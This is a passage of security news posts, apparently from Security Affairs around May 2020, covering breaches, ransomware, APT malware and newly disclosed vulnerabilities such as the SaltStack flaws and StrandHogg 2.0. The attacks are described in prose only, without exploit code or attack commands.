“Cisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE. Those servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised. The servers were remediated on May 7, 2020.” reads the advisory.

The six servers are part of the backend infrastructure for VIRL-PE (Internet Routing Lab Personal Edition), a service that allows Cisco users to model and simulate their virtual network environment.

Cisco has it fixed and remediated all breached VIRL-PE servers on May 7, when it upgraded them by applying the patches for the SaltStack software.

Cisco also confirmed that the Cisco Modeling Labs Corporate Edition (CML), a network modeling tool, is affected by the issues.

At the end of April, researchers from F-Secure disclosed a number of vulnerabilities in the “Salt” framework, including two issues that could be exploited by attackers to take over Salt installations.

The two flaws, tracked as CVE-2020-11651 and CVE-2020-11652, are a directory traversal issue and an authentication bypass vulnerability respectively. Chaining the issue, an attacker could bypass authentication and run arbitrary code on Salt master servers exposed online.

Immediately after the public disclosure of the issues. administrators of Salt servers started reporting attacks exploiting the above vulnerabilities last week, threat actors used them to deliver backdoors and miners.

Shortly after the disclosure of the flaws, threat actors exploited them in several attacks against organizations, including mobile operating system vendor LineageOS, Digicert CA, blogging platform Ghost, cloud software provider Xen Orchestra, and search provider Algolia.

Pierluigi Paganini

(SecurityAffairs – Cisco VIRL-PE infrastructure, hacking)

The post Security breach impacted Cisco VIRL-PE infrastructure appeared first on Security Affairs.

Google TAG report Q1 details about nation-state hacking and disinformation

Google Threat Analysis Group (TAG) has published today its first TAG quarterly report that analyzes rising trends in nation-state and financially motivated attacks.

Google also discloses seven coordinated political influence campaigns that took place on its platforms during Q1 2020.

The Google Threat Analysis Group (TAG) is a group inside the Google’s security team that tracks operations conducted by nation-state actors and cybercrime groups. Google TAG has published today its first TAG quarterly report, the Q1 2020 TAG Bulletin, that provides insights on the campaigns monitored in the first quarter of 2020.

The report includes recent findings on government-backed phishing, threats, and disinformation campaigns, as well as information about actions the tech giant has taken against accounts coordinated influence campaigns. 

A first scaring trend reported by Google is the rising of hack-for-fire companies currently operating out of India.

Another trend was the rising number of political influence campaigns carried out by nation-state actors worldwide.

Experts confirm that threat actor continues to use COVID-19 lures, the pandemic has taken center stage in the world of government-backed hacking. Google continues to uncover COVID-19 themed attacks, groups like Iran-linked Charming Kitten focuses on medical and healthcare professionals, including World Health Organization (WHO) employees.

Experts reported new activity from “hack-for-hire” firms, many based in India, that are using Gmail accounts spoofing the WHO to target business leaders in financial services, consulting, and healthcare corporations within numerous countries including, the U.S., Slovenia, Canada, India, Bahrain, Cyprus, and the UK.

The lures are designed to trick victims into signing up for direct notifications from the WHO to stay informed of COVID-19 related announcements, and link to websites under the control of the attackers that clone the official WHO website. 

“We’ve seen new activity from “hack-for-hire” firms, many based in India, that have been creating Gmail accounts spoofing the WHO,” said Shane Huntley, head of Google TAG.

“The accounts have largely targeted business leaders in financial services, consulting, and healthcare corporations within numerous countries including, the US, Slovenia, Canada, India, Bahrain, Cyprus, and the UK.”

nation-state-COVID-19-campaign

While there have been many hack-for-hire companies around the world, most are located in the UE, Israel, and some Arab countries.

This is the first time that a report references the activity of hack-for-hire Indian companies.

The Google TAG also investigated groups that have also engaged in coordinated social and political influence campaigns.

The TAG team tracked a total of seven influence operations in Q1 2020.

In January Google terminated three YouTube channels as part of a coordinated influence operation linked to Iranian state-sponsored International Union of Virtual Media (IUVM) news organization.

In February, the company terminated one advertising account and 82 YouTube channels that were employed in a coordinated influence operation linked to Egypt.

The campaign was sharing political content in Arabic that was supportive of Saudi Arabia, the UAE, Egypt, and Bahrain and was critical of Iran and Qatar. The campaign being tied to the digital marketing firm New Waves based in Cairo.

In March, TAG terminated five different influence operations.

  • Three advertising accounts, one AdSense account, and 11 YouTube channels part of a coordinated influence operation linked to India sharing pro-Qatar messages.
  • Google banned one Play Store developer and terminated 68 YouTube channels as part of a coordinated influence operation sharing political content in Arabic supportive of Turkey and critical of the UAE and Yemen.
  • Google also terminated one advertising account, one AdSense account, 17 YouTube channels, and banned one Play developer involved in a coordinated influence operation linked to Egypt supporting of Saudi Arabia, the UAE, Egypt, and Bahrain and critical of Iran and Qatar.
  • Google also banned one Play developer and terminated 78 YouTube channels used in a coordinated influence operation linked to Serbia.
  • Google also shut down 18 YouTube channels that were part of a coordinated influence operation linked to Indonesia.

“Since March, we’ve removed more than a thousand YouTube channels that we believe to be part of a large campaign and that were behaving in a coordinated manner. These channels were mostly uploading spammy, non-political content, but a small subset posted primarily Chinese-language political content similar to the findings of a recent Graphika report. We’ll also share additional removal actions from April and May in the Q2 Bulletin.” concludes Google.

Pierluigi Paganini

(SecurityAffairs – Google TAG, nation-state acting)

The post Google TAG report Q1 details about nation-state hacking and disinformation appeared first on Security Affairs.

Ke3chang hacking group adds new Ketrum malware to its arsenal

The Ke3chang hacking group added a new malware dubbed Ketrum to its arsenal, it borrows portions of code and features from older backdoors.

The Ke3chang hacking group (aka APT15, Vixen Panda, Playful Dragon, and Royal APT) has developed new malware dubbed Ketrum by borrowing parts of the source code and features from their older Ketrican and Okrum backdoors.

“In mid May, we identified three recently uploaded samples from VirusTotal that share code with older APT15 implants. We named this new family of samples, “Ketrum”, due to the merger of features in the documented backdoor families “Ketrican” and “Okrum”.” reads the report published by the security firm Intezer.

“We believe the operation was conducted very recently.”

Back in 2013, the security researchers at FireEye spotted a group of China-Linked hackers that conducted an espionage campaign on foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang,’ now threat actors behind the attacks were spotted targeting personnel at Indian embassies across the world.

In May 2016, researchers from Palo Alto found evidence that the threat actors behind the Operation Ke3chang had been active since at least 2010.

The cyber-espionage group is believed to be operating out of China, it also targeted military and oil industry entities, government contractors and European diplomatic missions and organizations.

Intezer researchers recently discovered three Ketrum backdoor samples that were uploaded to the VirusTotal platform, they noticed the samples reused part of the source code and features from Ke3chang’s Ketrican and Okrum backdoors.

“Both Ketrum samples resemble a similar layout to previous Ke3chang tools, apart from low-level implementation and use of system APIs,” continues the analysis. “Even in the two Ketrum samples, there are differences between the low-level APIs used to achieve the same functionality.”

The three Ketrum samples connected to the same Chinese-based command and control server and have been used in two different time periods.

The command and control (C2) server was shut down during mid-May after the Ketrum samples were spotted.

Below the differences between the backdoors:


Ketrican
OkrumKetrum1Ketrum2
Identify installed proxy servers and use them
for HTTP requests
❌✅✅✅
Special folder retrieval using registry key[HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\
Explorer\Shell Folders]
✅❌✅✅
The response from the server
is an HTTP page with backdoor commands
and arguments included in the HTML fields
✅❌❌✅
Backdoor commands are determined by a hashing value received from C2❌✅❌❌
Communication with the C&C server is hidden in the Cookie and Set-Cookie headers of HTTP requests❌✅✅❌
Impersonate a logged in user’s security context❌✅✅❌
Create a copy of cmd.exe in their working directory and use it to interpret backdoor commands✅❌✅❌
Usual Ke3chang backdoor functionalities – download, upload, execute files/shell commands and configure sleep time✅✅✅✅
Screenshot-grabbing functionality❌❌✅❌

The Ketrum 1 sample was uploaded to VirusTotal in December 2019 and has a fake January 7, 2010, timestamp, It implements many features from Okrumand abandons more advanced Okrum features

Thee newer Ketrum 2 seems to have been built for minimalism, it drops most of the useless features of the Ke3chang backdoors.

“Unlike the Ketrican variant, Ketrum implants no longer try to weaken the system’s security configurations. In previous implants, Powershell was used for this end.” states the report.

“The group continues to morph its code and switch basic functionalities in their various backdoors. This strategy has been working for the group for years and there is no indication yet that it will deviate from this modus operandi.”

The Intezer’s report includes Indicators of compromised (IOCs) and additional details regarding the new Ketrum malware.

Pierluigi Paganini

(SecurityAffairs – Ke3chang, hacking)

The post Ke3chang hacking group adds new Ketrum malware to its arsenal appeared first on Security Affairs.

Microsoft warns about ongoing PonyFinal ransomware attacks

Microsoft is warning organizations to deploy protections against a new strain of PonyFinal ransomware that has been in the wild over the past two months.

Microsoft’s security team issued a series of tweets warning organizations to deploy protections against a new piece of ransomware dubbed PonyFinal that has been in the wild over the past two months.

PonyFinal is Java-based ransomware that is manually distributed by threat actors. The ransomware first appeared in the threat landscape earlier this year and was involved in highly targeted attacks against selected targets, mainly in India, Iran, and the US.

Human-operated ransomware is a technique usually employed in nation-state attacks that is becoming very popular in the cybercrime ecosystem.

In human-operated ransomware attack scenario, attackers use stolen credentials, exploit misconfiguration and vulnerabilities to access target networks, attempt to escalate privileges and move laterally, and deliver malware and exfiltrate data.

Most infamous human-operated ransomware campaigns include SodinokibiSamasBitpaymer, and Ryuk.

PonyFinal operators initially target organizations’ systems management server via brute force attacks, then they deploy a VBScript to run a PowerShell reverse shell to perform data dumps. Threat actors also use a remote manipulator system to bypass event logging.

Once the PonyFinal attackers gained access to the target’s network, they will move laterally to infect other systems with the ransomware.

In many cases, attackers targeted workstations running the Java Runtime Environment (JRE) because the PonyFinal is written in Java, but is some attacked the gang installed JRE on systems before deploying the ransomware.

The PonyFinal ransomware usually adds the “.enc” extension to the names of the encrypted files, it drops a ransom note (named README_files.txt) on the infected systems. The ransom note contains the payment instructions.

Experts pointed out that the encryption scheme of the PonyFinal ransomware is secure and there is no way at the time to recover encrypted files.

Unfortunately, PonyFinal is one of the several human-operated ransomware that were employed in attacks aimed at the healthcare sector during the COVID-19 pandemic.

Other threat are NetWalker, Maze, REvil, RagnarLocker, and LockBit.

Pierluigi Paganini

(SecurityAffairs – Ponyfinal ransomware, hacking)

The post Microsoft warns about ongoing PonyFinal ransomware attacks appeared first on Security Affairs.

Real estate app leaking thousands of user records and sensitive private messages

Real estate app leaking thousands of user records and sensitive private messages

The CyberNews research team uncovered an unsecured Amazon Simple Storage Service bucket of confidential user chat logs belonging to Real estate app Tellus, a US-based software company.

Tellus is a software company based in Palo Alto, California, backed by “well-known investors” that aims to “reimagine Real Estate for the modern era.” The company’s app portfolio includes the Tellus App, a real estate loan, management and investing program. Its target users are American landlords and tenants who can receive and pay rent money, as well as keep all of their ownership and rent related data like rental listings, personal information, and correspondence between tenants and landlords in one place.

The data bucket in question contains a folder with 6,729 CSV files related to the Tellus app that include the app’s user records, chat logs, and transaction records left on a publicly accessible Amazon storage server.

How we found the Tellus app bucket

We discovered the exposed data by scanning through open Amazon Simple Storage Service (S3) buckets, which are online servers that can be used to store data for websites, apps, archives, IoT devices, and more.

Amazon S3 buckets are also known for being challenging to secure, leaving many servers unprotected – and often in the news

We identified Tellus as the owner of the database and notified the company about the leak. As of May 15, the data bucket security issue has been fixed by the Tellus security team and the data is no longer accessible. 

What’s in the data bucket?

The unsecured and unencrypted Amazon S3 bucket contains, among other things:

  • 16,861 user records, including 3,194 verified property owner records and 1,294 verified tenant records stored in separate files
  • Chat logs of private messages between thousands of Tellus platform users, including landlords, tenants, building managers, investors, and Tellus support staff between early 2018 and January 2020
  • Tens of thousands of timestamped property owner transaction records
  • Detailed tenant lead and payment records, including transaction metadata

All of this data is conveniently stored in spreadsheet format that can be easily opened, read, and downloaded by anyone who knows what to look for.

The exposed user records contain:

  • Full names of users, including verified tenants and property owners
  • Traceable user IDs used in transaction records and other logs
  • Email addresses
  • Phone numbers

Example of leaked user records:

The private messages in the chat logs and tenant lead files contain not only the texts of the conversations themselves, but also deeply sensitive content attached therein, including:

  • Full names of the parties involved in the conversation
  • Rent amounts and dates when they are due
  • Tenants’ rented home addresses
  • Case charges and court dates
  • Tenant document scans
  • Screenshots of sensitive images, including other conversations on social media

Example of leaked private messages:

Example of leaked tenant lead messages:

Example of leaked tenant lead messages

Example of leaked transaction records:

Example of leaked transaction records

This means that, in the worst-case scenario, leaving the Tellus S3 bucket unsecured and unencrypted might have led to the continued exposure of data belonging to the entire Tellus user base over a period of up to two years, from 2018 to 2020.

Who had access?

The exposed data was hosted on an Amazon Simple Storage Service (S3) server and located in the US. It is currently unknown for how long the data was left unprotected, and we assume that anyone who knew what to look for could have accessed the data bucket without needing any kind of authentication during the unspecified exposure period.

With that said, it is unclear if any malicious actors have accessed the unsecured data bucket until it was closed by Tellus.

What’s the impact?

While numbers-wise this might not appear like a major leak, the impact on the nearly 17,000 Americans whose records were exposed could be significant if certain data was made publicly available.

Here’s how attackers might use the information found in the Tellus S3 bucket against the exposed users:

  • Blackmailing both tenants and landlords by threatening to publicize the sensitive content found in their private messages and transaction logs
  • Using the information found in private messages to mount targeted phishing attacks, hack online bank accounts, and engage in identity theft
  • Spamming emails and phones
  • Brute-forcing the passwords of the email addresses 
  • Brute-forcing the passwords of the Tellus accounts and stealing the funds therein

Original post available on Cybernews:

https://cybernews.com/security/real-estate-app-leaking-thousands-of-user-records-and-sensitive-private-messages/

About the author Edvardas Mikalauskas

Edvardas Mikalauskas is a writer for CyberNews.com. Ed’s interests include all things tech and cybersecurity. You can reach him via email or find him on Twitter giggling at jokes posted by parody accounts.

Pierluigi Paganini

(SecurityAffairs – Real estate app leaking, hacking)

The post Real estate app leaking thousands of user records and sensitive private messages appeared first on Security Affairs.

Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

A new ransomware dubbed FuckUnicorn has been targeting computers in Italy by tricking victims into downloading a fake contact tracing app, named Immuni, that promises to provide real-time updates for the COVID-19 outbreak.

The COVID-19-themed campaign use messages that pretend to be sent by the Italian Pharmacist Federation (FOFI).

The Italian Computer Emergency Response Team (CERT) from the AgID Agency released an advisory about this threat.

Attackers attempt to take advantage of the interest on the contact tracing app Immuni that was chosen by the Italian government to trace the evolution of the pandemic in the country.

The new ransomware was first spotted by the malware researcher JamesWT_MHT that shared samples with the malware community.

Email messages used as lure are written in Italian and informs citizens of the release of a beta release of the Immuni app for PC.

The campaign targeted pharmacies, universities, doctors, and other entities involved in the fight against COVID-19 outbreak.

To trick victims into downloading the malicious app, threat actors set up a malicious domain that clones the content of the legitimate site of the Federazione Ordini Farmacisti Italiani (FOFI.it).

The attackers registered the “fofl.it,“ domain to trick victims.

The content of the email includes download links and contact information that combines email addresses from the attacker and FOFI.

Upon executing the malware it displays a fake Coronavirus Map from the Center for Systems Science and Engineering at Johns Hopkins University.

In the background the FuckUnicorn starts encrypting data on the system, it encrypts the files in certain paths (/Desktop, /Links, /Contacts, /Documents, /Downloads, /Pictures, /Music, /OneDrive, /Saved Games, /Favorites, /Searches, and /Videos) with these extensions:

.Txt, .jar, .exe, .dat, .contact, .settings, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv,. py, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .htm, .xml, .psd, .pdf, .dll, .c, .cs, .mp3, .mp4, .f3d, .dwg, .cpp, .zip, .rar, .mov, .rtf, .bmp, .mkv, .avi, .apk, .lnk, .iso, .7-zip, .ace, .arj, .bz2, .cab, .gzip, .lzh, .tar, .uue, .xz, .z, .001, .mpeg, .mp3, .mpg, .core, .crproj, .pdb, .ico, .pas , .db, .torrent "

The malicious code adds the “.fuckunicornhtrhrtjrjy” extensions to names of encrypted files.

The FuckUnicorn drops a ransom note written in Italian that asks victims to pay EUR 300, worth of Bitcoin, in three days or the data would be lost.

The email address in the ransom note is invalid making it impossible to send the attacker the payment proof.

At the time, there are no transactions recorded for the wallet included in the ransom note.

The good news for the victims is that CERT-AgID discovered that the password for encrypting the files is sent in clear text to the attacker, this means that it can be retrieved from the network traffic.

Pierluigi Paganini

(SecurityAffairs – FuckUnicorn, hacking)

The post Fuckunicorn ransomware targets Italy in COVID-19 lures appeared first on Security Affairs.

Boris Johnson to reduce Huawei’s role in national 5G network

UK Government will reduce the presence of the equipment manufactured by Chinese Huawei in its 5G network in the wake of the coronavirus outbreak.

UK Government will reduce the presence of the equipment manufactured by the Chinese tech firm Huawei in its 5G network in the wake of the Coronavirus outbreak.

Early this year, the UK Government agreed on the involvement of Huawei in the national 5G network, while the United States expressed its disappointment for the Johnson decision and threatened to limit intelligence sharing with the ally. 

“The Prime Minister plans to reduce Huawei’s involvement in Britain’s 5G network in the wake of the coronavirus outbreak, the Telegraph has learned.” reported The Telegraph.

“Boris Johnson has instructed officials to draw up plans that would see China’s involvement in the UK’s infrastructure scaled down to zero by 2023.”

Prime Minister Boris Johnson has tacked officials to draft plans that would define the way Chinese firms will be involved in Britain’s infrastructure end by 2023.

Next month Mr Johnson will visit the US to participate at the G7 summit, he aims at confirming that the UK jhas reduced its dependecy from the China provisioning of 5G network equipment, a circumstance that could ramp up trade talks with US President Donald Trump.

In January, the EU’s executive Commission presented a set of rules and technical measures aimed at reducing cybersecurity risks from the adoption of 5G. The Commission’s recommendations included blocking high-risk equipment suppliers from “critical and sensitive” components of 5G infrastructures, such as the core.

The EU’s executive Commission did not explicitly mention companies, but a clear reference is to the Chinese firm Huawei.

In January, the British Government also agreed to assign a limited role for Huawei in the country’s 5G network, but highlighted that “high-risk vendors” would be excluded from the building of “sensitive” core infrastructure.

US Government continues to push hard for countries to ban Chinese companies from building their next-generation 5G network, claiming Chinese equipment can be exploited by the Chinese government for cyber espionage.

MPs in Johnson’s party doesn’t agree with the involvement of Huawei in building 5G network.

“He has taken a great many soundings from his own MPs on this issue and shares their serious concerns. The deal was struck before the pandemic hit but coronavirus has changed everything,” an unnamed source told The Telegraph.

Pierluigi Paganini

(SecurityAffairs – 5G, hacking)

The post Boris Johnson to reduce Huawei’s role in national 5G network appeared first on Security Affairs.

StrandHogg 2.0 Android flaw affects over 1 Billion devices

Researchers disclosed a new critical vulnerability (CVE-2020-0096, aka StrandHogg 2.0) affecting the Android operating system that could allow attackers to carry out a sophisticated version of Strandhogg attack.

A group of Norwegian researchers disclosed a critical flaw, tracked as CVE-2020-0096, affecting Android OS that could allow attackers to carry out a sophisticated version of the Strandhogg attack.

In December, security experts atPromon disclosed a vulnerability, dubbed StrandHogg, that has been exploited by tens of malicious Android apps.

The name StrandHogg comes from an old Norse term that refers to a tactic adopted by the Vikings that consists of raiding coastal areas to plunder and hold people for ransom.

The vulnerability resides in the Android’s multitasking system that could be exploited by a rogue application installed on the device to pose as a legitimate application in the attempt to harvest elevated permissions from the victims.

StrandHogg

A rogue Android app could use the StrandHogg tactic to trick the user into granting it the permissions to control the devices.

The permissions granted to the app could allow spying on the user by accessing the camera and microphone, obtaining the device’s location, reading the SMSs, capturing login credentials (including 2FA codes via SMS), accessing private photos and videos, accessing contacts and call logs, and also making calls and recording the victim’s conversations.

The same team of Norwegian researchers that discovered the Strandhogg now reported the CVE-2020-0096 flaw and called Strandhogg 2.0. The ‘Strandhogg 2.0,’ vulnerability affects all Android devices, except those running Android Q/10, this means that 80%-85% Android devices are exposed to hack.

The Strandhogg 2.0 flaw is an elevation of privilege flaw that allows hackers to gain access to almost all apps installed on the devices.

StrandHogg 1.0 could be used to attack apps one at a time, StrandHogg 2.0 allow attackers “dynamically attack nearly any app on a given device simultaneously at the touch of a button,” all without requiring a pre-configuration for each targeted app.

“If the victim then inputs their login credentials within this interface, those sensitive details are immediately sent to the attacker, who can then login to, and control, security-sensitive apps,” Promon says.

“Utilizing StrandHogg 2.0, attackers can, once a malicious app is installed on the device, gain access to private SMS messages and photos, steal victims’ login credentials, track GPS movements, make and/or record phone conversations, and spy through a phone’s camera and microphone.”

StrandHogg 2.0.

Targeted users could not spot the StrandHogg attack, which can be exploited without root access and works on all versions of Android.

The new flaw can be used for various types of phishing attack, such as displaying a fake login screen, gathering different types of sensitive information, denial of service, and/or collecting permissions
under the guise of the target app (such as SMS, GPS positioning and more).

Experts reported the flaw to Google in December, the tech giant released a security patch to manufacturing companies in April 2020, that are going to release security updates to their devices.

Below the PoC video released by the experts:

Pierluigi Paganini

(SecurityAffairs – StrandHogg 2.0 , hacking)

The post StrandHogg 2.0 Android flaw affects over 1 Billion devices appeared first on Security Affairs.

New Turla ComRAT backdoor uses Gmail for Command and Control

Researchers uncovered a new advanced variant of Turla’s ComRAT backdoor that leverages Gmail’s web interface as C2 infrastructure.

Cybersecurity researchers discovered a new version of the ComRAT backdoor, also known as Agent.BTZ, which is a malware that was employed in past campaigns attributed to the Turla APT group.

Earlier versions of Agent.BTZ were used to compromise US military networks in the Middle East in 2008.

The new variant leverages Gmail’s web interface to covertly receive commands and exfiltrate sensitive data.

ComRAT v4 appeared in the threat landscape in 2017 and is still used by threat actors, recently a new variant was used in attacks against two Ministries of Foreign Affairs in Eastern Europe and a national parliament in the Caucasus region.

ComRAT turla 2.png

This new version was developed from scratch and is far more complex than its predecessors. 

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

ComRAT is a sophisticated backdoor developed in C++, it could perform many malicious actions on the infected systems, such as executing additional payloads or exfiltrating files.

The backdoor uses a Virtual FAT16 File System formatted in FAT16, it is deployed using existing access methods, including the PowerStallion PowerShell backdoor.

ComRAT leverages the following C2 channels:

  • HTTP: It uses exactly the same protocol as ComRAT v3
  • Email: It uses the Gmail web interface to receive commands and exfiltrate data

The main components of the of the ComRAT v4 are:

  • an orchestrator, which is injected into explorer.exe process and is used to control most of ComRAT functions.
  • a communication module (a DLL), which is injected into the default browser by the orchestrator. It communicates with the orchestrator using a named pipe.
  • a Virtual FAT16 File System, containing the configuration and the logs files.

“The main use of ComRAT is discovering, stealing and exfiltrating confidential documents. In one case, its operators even deployed a .NET executable to interact with the victim’s central MS SQL Server database containing the organization’s documents.” reads the report published by the experts.

To evade detection, ComRAT files, with the exception of the orchestrator DLL and the scheduled task for persistence, are stored in a virtual file system (VFS). The default VFS container file is hardcoded in the orchestrator components that drops the first time it is executed.

The C&C “mail” mode was specific to the Gmail email provider.

The orchestrator reads the email address in /etc/transport/mail/mailboxes/0/command_addr by parsing the inbox HTML page (using Gumbo HTML parser) and the cookies to authenticate on Gmail in /etc/transport/mail/mailboxes/0/cookie.
The cookies have a limited lifetime so they should be updated from each interaction.

The Gmail parser could get the list of emails with subject lines that match those in a “subject.str” file in the VFS.

The comRAT backdoor downloads the attachments (e.g. “document.docx,” “documents.xlsx”) from each email that meets the above criteria, then it deleted the emails to avoid processing them twice.

Despite their extensions, the attachments are not Office documents, but rather encrypted blobs of data that include a specific command to be executed.

The backdoor creates an attachment containing the result of the commands, its name consists of 20 random digits and of the .jpg.bfe so-called double extension.

The analysis of the time of day that commands were sent in a one-month period reveals that the operators are working in the UTC+3 or UTC+4 time zone.

“Version four of ComRAT is a totally revamped malware family released in 2017,” ESET concludes. “Its most interesting features are the Virtual File System in FAT16 format and the ability to use the Gmail web UI to receive commands and exfiltrate data. Thus, it is able to bypass some security controls because it doesn’t rely on any malicious domain.”

Pierluigi Paganini

(SecurityAffairs – Tesla, hacking)

The post New Turla ComRAT backdoor uses Gmail for Command and Control appeared first on Security Affairs.

Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

Hangzhou, one of the major tech hubs in China, is planning to permanently use the tracking system developed to fight the COVID-19 outbreak.

The city’s health commission declared that the permanent version of the contact tracing system would be a “‘firewall’ to enhance people’s health and immunity” after the COVID-19 pandemic.

The contact tracing app was developed by Tencent and Alibaba and is mandatory, it implements a “triage” system based on the travel history of the citizen.

The app is currently mandatory and assigns users green, yellow, or red status. Residents who visited COVID-19 hot spots or that were in contact with infected individuals, would be given a red code and be asked to quarantine for 14 days. Residents in good health status and had no contact with infected individuals cases are given a green code and could move without any restriction around the city.

COVID-19 contact tracing system

The app is already used by one billion people and the codes it generates have been scanned more than nine billion times.

“According to Qiu Yuepeng, vice president of Tencent and President of Tencent Cloud, since the official version of the health code was launched on February 9, Tencent’s health code has covered more than 20 provinces and more than 400 cities and counties in the country, covering more than 1 billion people.” reads the post published by Tencent. “The total number of visits exceeded 26 billion, and the cumulative number of code visits exceeded 9 billion.”

The Hangzhou’s Health Commission aims to permanently use the system that would assign users a health score ranging from 0 to 100 based on different factors, such as their medical records, physical examinations, and habits (e.g. steps they walk, or hours they sleep or make sport daily).

Clearly privacy advocates fear that the contact tracing system could improve the dragnet surveillance implemented by the Chinese government to monitor its citizens.

Facial recognition technology is widely adopted in China where the government already uses the social credit system to monitor citizen’s online behaviour and assigns a “citizen score.”

Pierluigi Paganini

(SecurityAffairs – COVID-19, contact tracing system)

The post Hangzhou could permanently adopt COVID-19 contact-tracing app appeared first on Security Affairs.

Bugs in open-source libraries impact 70% of modern software

70 percent of mobile and desktop applications that today we use are affected at least by one security flaw that is present in open-source libraries.

According to the Veracode’s annual State of Software Security report, 70 percent of mobile and desktop applications being used today have at least one security flaw that is the result of the use of an open-source library.

Experts pointed out that every library could be affected by one o more issues which will be inherited from all the applications that use them.

According to Veracode’s annual State of Software Security report, almost any modern application includes open source libraries that implement functionality that would be extremely tedious to write from scratch.

The experts analyzed over 85,000 applications and related imported libraries, accounting for over 351,000 unique external libraries.

“The number of external libraries found in any given application varies quite a bit depending on the language in which the application is being developed.” reads the report.

The use of open-source libraries is quite common, for example most JavaScript applications contain hundreds of libraries.

“Our research found that most JavaScript applications contain hundreds of open source libraries – some have over 1,000 different libraries. In addition, most languages feature the same set of core libraries.” reads the post published by Veracode. “JavaScript and PHP in particular have several core libraries that are in just about every application.”

Most of the vulnerabilities affecting the applications analyzed by the researchers were present in the Swift, .NET, Go, and PHP open-source libraries.

“But not all flaws are equal. Some security issues are relatively exotic
or difficult to exploit while others may be much more significant to
their application. It’s this sorting of the zebras from the horses to
which we now turn.”
continues the report.

Swift is widely used in the Apple ecosystem, it has the highest density of vulnerabilities, but it has an overall low percentage of flawed libraries.

.NET has the lowest percentage of flawed libraries on a population that is more than 17 times larger than Swift.

Go has a high percentage of libraries with flaws, the good news is that it has an overall low number of flaws per individual library. Compared with Go, PHP has a higher rate of flawed libraries, but more double the density of flaws in a given library.

open-source libraries flaws

Cross-site scripting (XSS) is the most common vulnerability affecting open-source libraries, it is present in 30 percent of them. Other major issues are insecure deserialization (23.5 percent) and broken access control (20.3 percent). Insecure deserialization was a rare issue flaw among in-house applications.

“The report found that 70 percent of applications have a security flaw in an open source library on initial scan. Cross-Site Scripting is the most common vulnerability category found in open source libraries – present in 30 percent of libraries – followed by insecure deserialization (23.5 percent) and broken access control (20.3 percent).” continues the post.

Experts pointed out that addressing security vulnerabilities in open-source libraries is so difficult.

“In the good news department, addressing the security flaws in these libraries is most often not a significant job. Most library-introduced flaws (nearly 75 percent) in applications can be addressed with only a minor version update. Major library upgrades are not usually required!” concludes the report.

“This data point suggests that this problem is one of discovery and tracking, not huge refactoring of code.”

Pierluigi Paganini

(SecurityAffairs – open-source libraries flaws, hacking)

The post Bugs in open-source libraries impact 70% of modern software appeared first on Security Affairs.

Cisco fixed a critical issue in the Unified Contact Center Express

Cisco has released several security patches, including one for a critical issue, tracked as CVE-2020-3280, in the call-center software Unified Contact Center Express.

Cisco released a set of security patches, including one for a critical flaw in its call-center software Unified Contact Center Express, tracked as CVE-2020-3280.

The CVE-2020-3280 vulnerability is a remote code execution issue that resides in the Java remote management interface for Unified CCE.

“A vulnerability in the Java Remote Management Interface of Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.” reads the security advisory published by Cisco.

“The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a malicious serialized Java object to a specific listener on an affected system.”

An unauthenticated, remote attacker could exploit the issue to execute arbitrary code as the root user on a vulnerable device.

The issue could be exploited by supplying a malformed Java object to a specific listener on an vulnerable system

Administrators should update their Unified CCE installs as soon as possible.

The good news is that Cisco is not aware of attacks in the wild that exploited the flaw.

Pierluigi Paganini

(SecurityAffairs – Unified CCE, hacking)

The post Cisco fixed a critical issue in the Unified Contact Center Express appeared first on Security Affairs.

Crooks hacked e-shops and threaten to sell SQL databases if ransom not paid

Threat actors are offering for sale more than two dozen SQL databases belonging to e-commerce websites for different countries.

Hackers are offering for sale more than two dozen SQL databases stolen from online shops from multiple countries.

Threat actors have compromised insecure servers exposed online and after copying the content of their websites they left a ransom note.

Some of the databases are dated as 2016, but data starts from March 28, 2020.

Crooks’ demand is BTC 0.06 ($485 at current price), they threaten to leak the content of the database if the victims don’t pay the ransom in 10 days.

The ransom notes observed in this campaign include a couple of wallets that received more than 100 transactions for a total of BTC 5.8 ($47,150 at current price).

“The number of abuse reports for these two wallets is over 200, the oldest being from September 20, 2019. The most recent one is from May 20 and this month alone there were nine reports, indicating that the actor is highly active.” reported BleepingComputer.

“It is important to note that the hacker may use more than the wallets found by BleepingComputer.”

The seller is offering 31 databases and gives a sample for the buyers to check the authenticity of the data.

Most of the listed databases are from online stores in Germany, others e-store hacked by threat actors are from Brazil, the U.S., Italy, India, Spain, and Belarus.

The hacked stores were running Shopware, JTL-Shop, PrestaShop, OpenCart, Magento v1 and v2 e-commerce CMSs.

The databases contain a total of 1,620,000 rows, exposed records include email addresses, names, hashed passwords (e.g. bcrypt, MD5), postal addresses, gender, dates of birth.

It isn’t the first time that crooks target unprotected databases, experts observed several attacks targeting unprotected MongoDB installs.

Pierluigi Paganini

(SecurityAffairs – SQL databases, hacking)

The post Crooks hacked e-shops and threaten to sell SQL databases if ransom not paid appeared first on Security Affairs.

Ragnar Ransomware encrypts files from virtual machines to evade detection

Ransomware encrypts from virtual machines to evade antivirus

Ragnar Locker deploys Windows XP virtual machines to encrypt victim’s files, the trick allows to evaded detection from security software.

Crooks always devise new techniques to evade detection, the Ragnar Locker is deploying Windows XP virtual machines to encrypt victim’s files while bypassing security measures.

The Ragnar Locker appeared relatively in the threat landscape, at the end of the 2019 it was employed in attacks against corporate networks. 

One of the victims of the ransomware is the energy giant Energias de Portugal (EDP), where the attackers claimed to have stolen 10 TB of files.

While many ransomware infections terminate security programs before encrypting,

